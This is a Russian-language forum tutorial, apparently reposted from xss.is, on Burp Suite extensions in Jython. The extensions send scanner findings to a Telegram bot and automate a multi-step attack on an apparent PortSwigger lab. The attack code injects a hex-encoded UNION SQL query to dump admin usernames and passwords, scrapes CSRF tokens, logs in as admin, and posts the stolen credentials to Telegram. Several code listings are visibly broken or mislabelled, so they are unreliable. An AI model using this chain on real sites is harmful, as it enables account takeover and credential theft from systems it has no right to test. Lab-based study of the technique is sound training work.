Свое расширение Burp: оповещение об уязвимостях в ТГ и многошаговые атаки

D2

Администратор
Регистрация
19 Фев 2025
Сообщения
4,380
Реакции
0
Автор petrinh1988
Источник https://xss.is


Что же, продолжим разбираться с API Burp. В предыдущих статьях познакомились с работой со стандартными сканерами (тыц и тыц), сегодня предлагаю поработать с еще одним интересным слушателем.

Есть у BurpSuite интерфейс IScannerListener с единственным методом newScanIssue(). Срабатывает это чудо, как понятно из названия, в момент добавления новой уязвимости. Единственный аргумент функции имеет тип IScanIssue, соответственно, это объект уязвимости, который рассматривал еще в первой статье.

Предлагаю с места в карьер — напишем расширение, которое будет отстукивать в телегу о новой найденной уязвимости. Процесс создания нового бота в телеге описан уже миллионы миллиардов раз, поэтому особо разбирать их не буду. Тем более, что он будет однонаправленный, а там и вникать не во что. Болванка расширения:
Python: Скопировать в буфер обмена
Код:
from burp import IBurpExtender, IScannerListener

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, cb):
        cb.registerScannerListener(cb)

class ScannerListener(IScannerListener):

    def __init__(self, cb):
        self._cb = cb
        self._help = cb.getHelpers()

    def newScanIssue(self, newIssue):
        name = newIssue.getIssueName()
        confidence = newIssue.getConfidence()
        severity = newIssue.getSeverity()
        type = str(newIssue.getIssueType())
        print('Name: ' + name)
        print('Confidence: ' + confidence)
        print('Severity: ' + severity)
        print('Type: ' + type)


Для начала, как обычно, просто распечатаю получаемую информацию: названия уязвимостей, достоверность, уровень риска и тип уязвимости. Тип приводим к строке, так как изначально он int.

1722375302880.png



Круто, осталось добавить фильтры. Меня интересуют уязвимости с уровнем риска “Hight” и уверенностью "Certain". Для возможного масштабирования, добавлю два списка при помощи которых и буду проверять подходит ли уязвимость под параметры:
Python: Скопировать в буфер обмена
Код:
from burp import IBurpExtender, IScannerListener

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, cb):
        cb.registerScannerListener(ScannerListener(cb))
        cb.setExtensionName('Telegram Notifications')
        print('Loaded')

class ScannerListener(IScannerListener):
    GOOD_CONFIDENCES = ["Certain"]
    GOOD_SEVERITIES = ["High"]
 
    def __init__(self, cb):
        self._cb = cb
        self._help = cb.getHelpers()

    def newScanIssue(self, newIssue):      
        name = newIssue.getIssueName()
        confidence = newIssue.getConfidence()
        severity = newIssue.getSeverity()
        details = newIssue.getIssueDetail()
        if confidence in self.GOOD_CONFIDENCES and severity in self.GOOD_SEVERITIES:
            print('Name: ' + name)
            print('Confidence: ' + confidence)
            print('Severity: ' + severity)
            print('Details: ' + details)

Отправка оповещений в Телеграм​

Здесь все немного заморочено. Воткнуть через pip пакет aiogram и написать ванильного бота не выйдет. Как минимум по той причине, что CPython утопал далеко за 3ю версию. Плюс далеко не все пакеты изначально совместимы с Juthon. Возможно есть какая-то версия какого-то пакета Telegram API, которую получится воткнуть. Или наладить взаимодействие через “посредника”, но все это слишком заморочено для мне. Проще было пойти другим путем.

Пути решения проблемы вижу два: прямое взаимодействие с API через requests или использование Java-библиотеки для взаимодействия с ботом. Да. Jython хорош тем, что может работать с библиотеками Java. Мы это уже делали в прошлой статье, когда использовали Java.net.URL. Но в этом случае, когда подразумеваются только оповещения, городить огород нет смысла.

Работать будем со standalone версией Jython, если не скачана - качаем отсюда. В настройках расширений Burp указываем путь к этому файлу. Дальше идем в консоль, переходим в папку с нашим JAR. Добавим возможность использовать pip:

Bash: Скопировать в буфер обмена
java -jar jython-standalone-2.7.3.jar -m ensurepip

Супер, теперь устанавливаем пакет requests следующей командой:

Bash: Скопировать в буфер обмена
java -jar jython-standalone-2.7.3.jar -m pip install requests

Все готово к написанию кода. Самое время пройти в BotFather, создать нового бота и скопировать токен. Инструкций в интернет масса.

Для теста воспользуемся методом /getMe, возвращающем информацию о боте. Нужно выполнить GET-запрос по адресу https://api.telegram.org/bot{TOKEN}/getMe. Запихну запрос прямо в функцию регистрации коллбэков (registerExtenderCallbacks) и распечатаю полученный текст:
Python: Скопировать в буфер обмена
Код:
from burp import IBurpExtender, IScannerListener
import requests

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, cb):
        response = requests.get('https://api.telegram.org/bot7LALSLSLSLS:LALALALALALALALAL/getMe')
        print(response.text)

1722375336757.png



Конечно же, все четко работает. Метод вернул информацию, а значит все у нас получится. В ScannerListener добавлю константу с адресом и метод отправки сообщения. Отправлять буду название, ссылку и детальное описание.
Python: Скопировать в буфер обмена
Код:
from burp import IBurpExtender, IScannerListener
import requests

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, cb):
        cb.registerScannerListener(ScannerListener(cb))
        cb.setExtensionName('Telegram Notifications')
        print('Loaded')

class ScannerListener(IScannerListener):
    BOT_URL = 'https://api.telegram.org/botLALALA:LALALALALALALA/sendMessage'
    CHAT_ID = 111111111111
    GOOD_CONFIDENCES = ["Certain"]
    GOOD_SEVERITIES = ["High"]
 
    def __init__(self, cb):
        self._cb = cb
        self._help = cb.getHelpers()

    def newScanIssue(self, newIssue):      
        name = newIssue.getIssueName()
        confidence = newIssue.getConfidence()
        severity = newIssue.getSeverity()
        details = newIssue.getIssueDetail()
        url = getUrl().toString()
        if confidence in self.GOOD_CONFIDENCES and severity in self.GOOD_SEVERITIES:
            self._send_message(name, details, url)
     
    def _send_message(self, name, details, url):
        text = '<b>' + name + '</b>\n' + details + '\nURL: ' + url
        data = {
            'chat_id': self.CHAT_ID,
            'text': text,
            'parse_mode': 'HTML'
        }
        requests.post(self.BOT_URL, data=data)

1722375366245.png



Ура, все четко работает. Хотя признаюсь, фильтры отключил чтобы не затягивать по времени. Но при включении все начнет отрабатывать четко. Теперь можно запускать сканер и идти в бар пить пиво с друзьями. Когда потребуюсь, бот позовет меня.

Кстати, в описании уязвимости BurpSuite для разметки использует простой HTML. При отправке сообщения, 'parse_mode' тоже устанавливаю в HTML, поэтому разметка будет четко передаваться в сообщение Telegram. Ну а дальше, как фантазия разгуляется. Можно разные сообщения форматировать по разному, как вариант, можно передавать запрос/ответ как куски кода из getHttpMessages(). Напомню, что эта функция возвращает массив IHttpRequestResponse, среди методов есть getRequest() и getResponse().

Многошаговая атака​

В прошлой статье было реализовано прохождение лабораторной PortSwigger в полностью автоматическом режиме. Но сильно угнетает, что прохождение было прописано линейно. В реальной жизни, подобный подход не очень жизнеспособный. Атака может строиться на целой серии уязвимостях, которые могут появляться независимо друг от друга. Соответственно, гораздо логичнее выстраивать событийную модель. Случилось событие — запустили подходящий процесс.

Для демонстрации некоторых возможностей API Burp Extender, предлагаю переделать прошлое решение на событийную модель. Единственное, уберу полную автоматизацию, так как есть один небольшой нюанс. Заключается нюанс в том, что на последних шагах нужно именно линейное поведение. Нужно последовательно получить страницу логина для парсинга CSRF и session-куки. Далее, с этими данными сразу логиниться. Если на задачу накидывается массово несколько сканеров, то сервер обновляет связку куки-CSRF или происходит что-то подобное, в результате чего работа сканера становится неэффективной.

Для реализации событийной модели, нам потребуется тот же IScannerListener, а также познакомиться с doActiveScan(0 и doPassiveScan(). Да-да, не шучу, сейчас все станет понятно…

Такие разные doActiveScan() и doPassiveScan()​

Речь не про активность и пассивность. Если внимательно изучить документацию, можно заметить, что указанные функции встречаются в двух интерфейсах. IScannerCheck и IBurpExtenderCallbacks. И здесь важно не запутаться. IScannerCheck предполагает слушатели событий уже запущенного сканирования, которые анализируют результат запроса и вносят свою лепту в происходящее. А коллбэки нужны для создания новых полноценных процессов сканирования. Т.е. Делают тоже самое, как если на запросе жмакной правой кнопкой и выбрать “Do active scan” или “Do passive scan”.

Вызвать функции из кода, достаточно просто, надо обратиться к объекту с коллбэками, который сохраняем каждый раз при загрузке расширения self._callbacks.doActiveScan().

При вызове будет создана новая очередь активного или пассивного сканирования, в соответствии с вызовом, основанная на конкретном запросе. При этом,на дашборде BurpSuite появится отдельный блок для созданных расширениями сканирований:

1722375393112.png




Использовать эти функции удобно, например, когда вы знаете, что следом за какой-то уязвимостью может стоять гораздо более интересная и было бы неплохо натравить отдельный полноценный сканер. Например, как в нашем пример — если есть уязвимость SQLi, почему бы не попытаться найти данные пользователя.

Об функциях запуска сканирования​


Начну с doPassiveScan(), т.к. она понятнее и проще. На входе функция принимает хост, порт, белево значение надо ли использовать https, запроса и ответ в байтах отдельными параметрами. Так как сканирование пассивное и не предполагает дополнительных запросов. Функция ничего не возвращает, просто отдала Burp задачу и забыла. Вся работа ложиться на слушателей.

doPassiveScan(java.lang.String host, int port, boolean useHttps, byte[] request, byte[] response)

doActiveScan() перегружена и может вызываться с двумя вариантами набора параметров. В первом случае, передаем: хост, порт, надо ли использовать https и объект запроса массивом байт. Во втором, к этому набору параметров добавляются координаты точки инъекции. Да, именно координаты, а саму точку инъекции уже построит сам BurpSuite.

doActiveScan(java.lang.String host, int port, boolean useHttps, byte[] request)

doActiveScan(java.lang.String host, int port, boolean useHttps, byte[] request, java.util.List<int[]> insertionPointOffsets)


Причем, результатом работы doActiveScan() будет объект очереди IScanQueueItem при помощи которого можно отслеживать процесс и, при необходимости, отменить его.

Список методов объекта очереди IScanQueueItem:

cancel() - просим Burp отменить выполнение сканирования.
getIssues() - получаем список уязвимостей, которые были обнаружены в результате запущенного нами сканирования
getNumErrors() - количество полученных ошибок (неудачные выполнения)
getNumInsertionPoints() - какое количество точек инъекции было использовано при атаках
getNumRequests() - количество выполненных запросов
getStatus() - состояние сканирования в текстовом виде

Была еще одна функция — getPercentageComplete() судя по всему, она должна была показывать процент выполнения, но была Depricated. Видимо коряво считала. В целом, и на дашборде вы не увидите адекватного отображения процесса. После сканирования, через кучу времени, могут прилетать результаты запросов и отправляться новые.

Разбивка кода на файлы​

За основу возьму решение из второй части…
Спойлер: Код автоматической атаки из второй части
Python: Скопировать в буфер обмена
Код:
from burp import IBurpExtender, IScannerCheck, IScanIssue
from java.net import URL
from array import array
import re

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, callbacks):
        callbacks.setExtensionName('SQLi in StockId')
        callbacks.registerScannerCheck(SQLIScannerCheck(callbacks))
        print('SQLi in StockId loaded')

class SQLIScannerCheck(IScannerCheck):
    used = False
    TEST_QUERY = "1 UNION SELECT 'PIPISKA'"
    ATTACK_QUERY = "1 UNION SELECT username || '~' || password FROM users"

    def __init__(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
 
    def doPassiveScan(self, baseRequestResponse):
        return None
 
    def doActiveScan(self, baseRequestResponse, insertionPoint):
        issues = []
        if self.used:
            return None
        print('Start check')
        requestInfo = self._helpers.analyzeRequest(baseRequestResponse)

        if requestInfo.getMethod() != 'POST':
            return None
        print('Method POST - Ok')
        insertionPointName = insertionPoint.getInsertionPointName()
        print(insertionPointName)
        if insertionPointName == 'storeid':
            print('Test insertion point stockId')
            testAttack = self._requestWithHex(baseRequestResponse, insertionPoint, self.TEST_QUERY)
            testResponse = self._helpers.bytesToString(testAttack.getResponse())
            print(testResponse)        
            if 'PIPISKA' in testResponse:
                print('Attack!')
                testHttpService = testAttack.getHttpService()
                testUrl = self._helpers.analyzeRequest(testAttack).getUrl()
                issues.append(SQLiScanIssue(testHttpService, testUrl, [testAttack]))

                attack = self._requestWithHex(baseRequestResponse, insertionPoint, self.ATTACK_QUERY)
                attackResponse = self._helpers.bytesToString(attack.getResponse())
                print(attackResponse)
                creds = re.search('(adm.*)~(.*)', attackResponse)            
                if not creds:
                    print("Can't find credentials")
                    return issues
                login = creds.group(1)
                password = creds.group(2)
                print('\nGot database credentials ' + login + ' ' + password)
                attackHttpService = attack.getHttpService()
                attackUrl = self._helpers.analyzeRequest(attack).getUrl()
                issues.append(DBCredsScanIssue(attackHttpService, attackUrl, [attack], login, password))

                print('Get CSRF!')
                protocol = attackUrl.getProtocol()
                port = attackUrl.getPort()
                host = attackUrl.getHost()

                requestUrl = URL(protocol, host, port, '/login')
                request = self._helpers.buildHttpRequest(requestUrl)
                loginPage = self._callbacks.makeHttpRequest(attackHttpService, request)
                loginPageResponse = self._helpers.bytesToString(loginPage.getResponse())
                csrf_re = re.search('(=?name="csrf").value="(.*)"', loginPageResponse)
                if not csrf_re:
                    print("Can't find CSRF")
                    return issues                
                csrf = csrf_re.group(2)
                print('CSRF is ' + csrf)
                print('Start join as ' + login)
                loginPageRequest = self._helpers.toggleRequestMethod(loginPage.getRequest())
                loginPageRequestInfo = self._helpers.analyzeRequest(loginPageRequest)
                loginHeaders = loginPageRequestInfo.getHeaders()
                loginHeaders = self._updateHeaders(loginHeaders, 'Content-Type', 'Content-Type: application/x-www-form-urlencoded')
                session_cookie = self._getSessionCookie(loginPage.getResponse())
                if session_cookie:
                    loginHeaders.add(session_cookie)            

                loginBodyString = 'csrf=' + csrf + '&username=' + login + '&password=' + password
                loginBody = self._helpers.stringToBytes(loginBodyString)
                loginHttpMessage = self._helpers.buildHttpMessage(loginHeaders, loginBody)

                print(self._helpers.bytesToString(loginHttpMessage))
                joinResult = self._callbacks.makeHttpRequest(attackHttpService, loginHttpMessage)

                print('Joined. Follow redirect')
                joinRequest = self._helpers.bytesToString(joinResult.getRequest())
                joinResponse = self._helpers.bytesToString(joinResult.getResponse())
                print(joinRequest)
                print('\n\n')
                print(joinResponse)

                joined_cookie = self._getSessionCookie(joinResponse)

                finishHeaders = self._helpers.analyzeRequest(joinRequest).getHeaders()
                finishHeaders = self._updateHeaders(finishHeaders, 'POST', 'GET /my-account?id=' + login)
                finishHeaders = self._updateHeaders(finishHeaders, 'Cookie', joined_cookie)
                finishRequest = self._helpers.buildHttpMessage(finishHeaders, '')
                finishResult = self._callbacks.makeHttpRequest(attackHttpService, finishRequest)
                print('Finish')
            self.used = True

        if len(issues):
            return issues
        return None
 
    def _updateHeaders(self, headers, start_with, new_value):
        for i in range(len(headers)):
            if str(headers[i]).startswith(start_with):
                headers[i] = new_value
        return headers

    def _getSessionCookie(self, response):
        headers = self._helpers.analyzeResponse(response).getHeaders()
        for header in headers:
            if str(header).startswith('Set-Cookie'):
                header = str(header).replace('Set-Cookie', 'Cookie')
                return header
        return False

    def _requestWithHex(self, baseRequestResponse, insertionPoint, query):
            newRequest =  insertionPoint.buildRequest(self._helpers.stringToBytes('PIPISKA'))
            hex_payload = self._toHexEntity(query)
            newRequest = self._helpers.bytesToString(newRequest).replace('PIPISKA', hex_payload, 1)
            newRequest = self._helpers.stringToBytes(newRequest)
            print('\nNew request:\n\n' + self._helpers.bytesToString(newRequest) + '\n\n')
            httpService = baseRequestResponse.getHttpService()
            return self._callbacks.makeHttpRequest(httpService, newRequest)
 
    def consolidateDuplicateIssues(self, existingIssue, newIssue):
       if existingIssue.getIssueName() == newIssue.getIssueName():
           return -1
       return 0
 
    def _toHexEntity(self, payload):
        str_payload = self._helpers.bytesToString(payload)
        hex_payload = ';'.join([hex(ord(char)).replace('0x', '&#x') for char in str_payload]) + ';'
        return hex_payload
 
class SQLiScanIssue(IScanIssue):
    def __init__(self, httpService, url, httpMessages):
        self._httpService = httpService
        self._httpMessages = httpMessages
        self._url = url    
 
    def getUrl(self):
        return self._url

    def getHttpMessages(self):
        return self._httpMessages

    def getHttpService(self):
        return self._httpService

    def getRemediationDetail(self):
        return None

    def getIssueDetail(self):
        return "SQL injection in XML parameter 'stockId' when injecting parameter in hex-entity encoding"

    def getIssueBackground(self):
        return None

    def getRemediationBackground(self):
        return None

    def getIssueType(self):
        return 0

    def getIssueName(self):
        return "SQLi in StockId XML Parameter"

    def getSeverity(self):
        return "High"

    def getConfidence(self):
        return "Certain"
 
class DBCredsScanIssue(IScanIssue):
    def __init__(self, httpService, url, httpMessages, login, password):
        self._httpService = httpService
        self._httpMessages = httpMessages
        self._url = url
        self._login = login
        self._password = password
 
    def getUrl(self):
        return self._url

    def getHttpMessages(self):
        return self._httpMessages

    def getHttpService(self):
        return self._httpService

    def getRemediationDetail(self):
        return None

    def getIssueDetail(self):
        return "Login: " + self._login + " Password: " + self._password

    def getIssueBackground(self):
        return None

    def getRemediationBackground(self):
        return None

    def getIssueType(self):
        return 0

    def getIssueName(self):
        return "DB Creds"

    def getSeverity(self):
        return "High"

    def getConfidence(self):
        return "Certain"

Откровенно говоря, кода уже слишком много для комфортного восприятия и изменения, а нам еще дописывать придется. Поэтому, разобью его на отдельные файлы. Более того, разделю расширение на два и налажу взаимодействие между ними. Обращу внимание, что это исключительно для демонстрации. Раз уже коснулись темы выстраивания структуры, почему бы не закрыть вопрос с подгрузкой классов из файлов и использования общих файлов?

Чтобы BurpSuite нас прекрасно понял и увидел файлы, которые надо импотнуть, поступить можно двумя способами. Первый — разместить файлы в одной папке с нашим расширением. Второй — в настройках расширений указать папку где Burp будет искать общие модули и подключать их. Общую папку также удобно использовать для библиотек.

1722375417019.png



Используем оба варианта вместе. Расширение, которое будет отвечать за прослушивание новых ошибок, будет в своей папке и файлы будут подгружаться из нее же. Расширение, отвечающее за сканирование, тоже положим в отдельную папку. Но, чтобы не дублировать константы, их положим в отдельную папку, укажем ее как папку с модулями.

Структура проекта будет такой:

1722374987750.png



Как видно из структуры, добавил провадер точки инъекции, чтобы кодирование происходило «на лету». Решил собрать в кучу все бест-практис из предыдущих статей. Все что нужно кодируется, при нахождении уязвимостей, после запускаются следующие сканирования и т.д.

Довольно теории, пора в бой…​

Принцип работы “сканирующей” части расширения: благодаря провайдеру точки инъекции, кодирование в hex происходит внутри точки, а значит не нужно писать чекер для поиска SQLi. Это сделает стандартный сканер на SQLi от Burp. Поэтому нужен только один обработчик (DBCredsScannerCheck), который вытащит данные для авторизации. Это сильно упрощает код и делает его читаемым
Спойлер: main.py
Python: Скопировать в буфер обмена
Код:
from burp import IBurpExtender
from insertion_provider import StockIdInsertionPointProvider
from scaner_db_creds import DBCredsScannerCheck


class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, callbacks):
        callbacks.setExtensionName('Autocomplete SQLi Scanner')
        callbacks.registerScannerInsertionPointProvider(StockIdInsertionPointProvider(callbacks))
        callbacks.registerScannerCheck(DBCredsScannerCheck(callbacks))
        print('Autocomplete SQLi Scanner loaded')



Практически весь код уже был в предыдущих частях. Разница только в том, что классы провайдера точек инъекций и сканера, подгружаются из других файлов. Которые лежат рядом с main.py
Спойлер: insertion_provider.py
Python: Скопировать в буфер обмена
Код:
from burp import IScannerCheck
from issue_db_creds import DBCredsScanIssue
from issue_full_admin_data import FullCredsScanIssue
from constsautosqli import INJECTION_POINT_NAME
import re


class DBCredsScannerCheck(IScannerCheck):
    def __init__(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
 
    def doPassiveScan(self, baseRequestResponse):
        return None
 
    def doActiveScan(self, baseRequestResponse, insertionPoint):
     
        method = self._helpers.analyzeRequest(baseRequestResponse).getMethod()
        if method == 'POST' and insertionPoint.getInsertionPointName() == INJECTION_POINT_NAME:
            attackResponse = self._helpers.bytesToString(baseRequestResponse.getResponse())


            if attackResponse.find('PIPISKA') != -1:
                if not self.username:
                    creds = re.search('(adm.*)~(.*)', attackResponse)    
             
                    if creds:
                        self.username = creds.group(1)
                        self.password = creds.group(2)
                        attackHttpService = baseRequestResponse.getHttpService()
                        attackUrl = self._helpers.analyzeRequest(baseRequestResponse).getUrl()
                        return [DBCredsScanIssue(attackHttpService, attackUrl, [baseRequestResponse], self.username, self.password)]
        return None
 
    def consolidateDuplicateIssues(self, existingIssue, newIssue):
       if existingIssue.getIssueName() == newIssue.getIssueName():
           return -1
       return 0


Здесь история похожая. Весь код уже был, кроме импорта из constsautosqli.py. Этот файл лежит в папке, которая в настройках BurpSuite указана, как папка с модулями.
Спойлер: scaner_db_creds.py
Python: Скопировать в буфер обмена
Код:
from burp import IScannerCheck
from issue_db_creds import DBCredsScanIssue
from issue_full_admin_data import FullCredsScanIssue
from constsautosqli import INJECTION_POINT_NAME
import re


class DBCredsScannerCheck(IScannerCheck):
    username = None
    password = None
    csrf = None


    def __init__(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
 
    def doPassiveScan(self, baseRequestResponse):
        return None
 
    def doActiveScan(self, baseRequestResponse, insertionPoint):
     
        method = self._helpers.analyzeRequest(baseRequestResponse).getMethod()
        if method == 'GET':
            if self.username and self.password:
                loginPageResponse = self._helpers.bytesToString(baseRequestResponse.getResponse())
                csrf_re = re.search('(=?name="csrf").value="(.*)"', loginPageResponse)
                if not csrf_re:
                    return None
             
                self.csrf = csrf_re.group(2)
                httpService = baseRequestResponse.getHttpService()
                url = self._helpers.analyzeRequest(baseRequestResponse).getUrl()


                return [FullCredsScanIssue(httpService, url, [baseRequestResponse], self.csrf, self.username, self.password)]
       
            return None


        elif method == 'POST' and insertionPoint.getInsertionPointName() == INJECTION_POINT_NAME:
            attackResponse = self._helpers.bytesToString(baseRequestResponse.getResponse())


            if attackResponse.find('PIPISKA') != -1:
                if not self.username:
                    creds = re.search('(adm.*)~(.*)', attackResponse)    
             
                    if creds:
                        self.username = creds.group(1)
                        self.password = creds.group(2)
                        attackHttpService = baseRequestResponse.getHttpService()
                        attackUrl = self._helpers.analyzeRequest(baseRequestResponse).getUrl()
                        return [DBCredsScanIssue(attackHttpService, attackUrl, [baseRequestResponse], self.username, self.password)]
        return None
 
    def consolidateDuplicateIssues(self, existingIssue, newIssue):
       if existingIssue.getIssueName() == newIssue.getIssueName():
           return -1
       return 0

Сканер, обрабатывает несколько нужных нам шагов. Первый - получение логина и пароля в результате POST-запроса с инъекцией. Данные сохраняются в самом объекте, так как он остается неизменным с момента загрузки до момента выгрузки расширения (ну или проекта Burp). Следующим этапом, данные обогощаютяс CSRF из GET-запроса к странице логина, после чего скопом отправляются как новая уязвимость. Еще отличие в использовании константы INJECTION_POINT_NAME. Той же, которую использовали в классе точки инъекции, как её имя.

Сканер можно было разделить на два отдельных, но тогда нужно было бы по другому решать вопрос хранения логина и пароля. В данном случае, это вполне оправданная жертва.

Спойлер: issue_db_creds.py
Python: Скопировать в буфер обмена
Код:
from burp import IScanIssue
from constsautosqli import ISSUE_DB_CREDS

class DBCredsScanIssue(IScanIssue):
    def __init__(self, httpService, url, httpMessages, login, password):
        self._httpService = httpService
        self._httpMessages = httpMessages
        self._url = url
        self._login = login
        self._password = password
 
    def getUrl(self):
        return self._url

    def getHttpMessages(self):
        return self._httpMessages

    def getHttpService(self):
        return self._httpService

    def getRemediationDetail(self):
        return None

    def getIssueDetail(self):
        return "<b>Login: </b>" + self._login + "\т <b>Password:</b> " + self._password

    def getIssueBackground(self):
        return None

    def getRemediationBackground(self):
        return None

    def getIssueType(self):
        return 0

    def getIssueName(self):
        return ISSUE_DB_CREDS

    def getSeverity(self):
        return "High"

    def getConfidence(self):
        return "Certain"


Объект уязвимости. Все тоже самое, разве что обернул данные в <b></b> чтобы в телеграм все выглядело красиво. Ну и, опять же, импорт констант из папки общих модулей.

Обработка событий​

1722375544163.png


Спойлер: main.py
Python: Скопировать в буфер обмена
Код:
from burp import IBurpExtender
from listener_sqli import SQLiListener
from listener_db_creds import DBCredsListener

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, callbacks):
        callbacks.setExtensionName('Autocomplete SQLi Listener')
        callbacks.registerScannerListener(SQLiListener(callbacks))
        callbacks.registerScannerListener(DBCredsListener(callbacks))
        print('Autocomplete SQLi Listener loaded')

В main.py регистрирую два листенера. Второй скорее для примера, без продолжения атаки он почти бесполезен, разве что использую его для пересылки учетных данных в Telegram-бота.
Спойлер: listener_sqli.py
Python: Скопировать в буфер обмена
Код:
from burp import IScannerListener
from constsautosqli import ISSUE_SQLI, INJECTION_POINT_NAME, ATTACK_QUERY
from array import array
import re

class SQLiListener(IScannerListener):
    def __init__(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()

    def newScanIssue(self, newIssue):
     
        if newIssue.getIssueName() == ISSUE_SQLI:
            if INJECTION_POINT_NAME in newIssue.getIssueDetail():
                httpMessage = newIssue.getHttpMessages()[0]              
                requestOld = httpMessage.getRequest()
                httpService = httpMessage.getHttpService()
                host = httpService.getHost()
                port = httpService.getPort()
                useHttps = httpService.getProtocol().lower() == 'https'
                requestString = self._helpers.bytesToString(requestOld)    
                hex_payload = ATTACK_QUERY
                startPayload = requestString.find('<storeId>') + 9
                endPayload = startPayload + len(hex_payload)
                positions = array('i', [startPayload, endPayload])
                requestString = re.sub('(?<=\<storeId\>).*(?=\<\/storeId\>)', hex_payload, requestString)
                request = self._helpers.stringToBytes(requestString)
                self._callbacks.removeScannerListener(self)
                self._callbacks.doActiveScan(host, port, useHttps, request, [positions])

Данный слушатель, как только появляется SQLi уязвимость, формирует новый объект запроса. Считает позиции начала и конца инъекции и запускает новый процесс сканирования на основе этого запроса. Повторюсь, запуск doActiveScan() подобен клику правой кнопкой мыши по запросу в HTTP History и выбору “Do active scan” в контекстном меню.

В этом случае запускаю функцию с указанием координат инъекции пэйлоада. Это нужно чтобы Burp понимал куда чего сувать, а не обрабатывал все подряд.

В свою очередь, слушатели новых уязвимостей связываются с самими уязвимостями через константы названий.
Спойлер: listener_db_creds.py
Python: Скопировать в буфер обмена
Код:
from burp import IScannerListener
from constsautosqli import ISSUE_DB_CREDS
import requests
import re

class DBCredsListener(IScannerListener):
    def __init__(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()

    def newScanIssue(self, newIssue):
        name = newIssue.getIssueName()
        if name == ISSUE_DB_CREDS:
            details = newIssue.getIssueDetail()
            url = getUrl().toString()
            self._send_message(name, details, url)
         
    def _send_message(self, name, details, url):
        text = '<b>' + name + '</b>\n' + details + '\nURL: ' + url
        data = {
            'chat_id': self.CHAT_ID,
            'text': text,
            'parse_mode': 'HTML'
        }
        requests.post(self.BOT_URL, data=data)

Последний обработчик уязвимости просто пересылает данные в телеграм.

Результат работы выглядит следующим образом:

1722375476291.png




Вместо заключения​

В этой статье я хотел не просто продемонстрировать несколько интересных методов, которые могут сильно помочь. Помочь превратить расширение из колхоза в полноценное масштабируемое решение. Но есть и другая цель — попытаться продемонстрировать гибкость и мощь, которую дает API Burp Extender. Посудите сами, казалось бы простейший и далеко не самый популярный инструмент подписки на найденные уязвимости, а как реализовали? Создали полезное расширение бот-информатор. Выстроили логичную и понятную структуру многошагового чека.

Надеюсь, что статьи полезны для вас. В ближайшее время будет еще больше интересного и приближенного к практике. Пока рассматривались более концептуальные вопросы, касающиеся основ. Но чем дальше мы идем, тем сильнее напрашиваются примеры из жизни. Те же многошаговые решения. Интересно ведь не просто построение шагов, но и включение других ресурсов и инструментов. Например промежуточного сервера для XSS. Или определение реального IP при нахождении SQL-уязвимости.

Так же уже давно напрашивается материал по построению пользовательских интерфейсов. Например, в оповещениях через Телеграм, было бы крайне удобно выбирать настройки через интерфейс. О каких ошибках отправлять сообщения, а про какие стоит умолчать. Не хардкодить, набивая массивы значениями, а кликать мышкой. Опять же, не затронули вопрос хранения информации между разными сеансами и проектами.

В общем, на этом сегодня все. Не стесняйтесь выразить своё мнение или задать вопросы по теме.
 
Сверху Снизу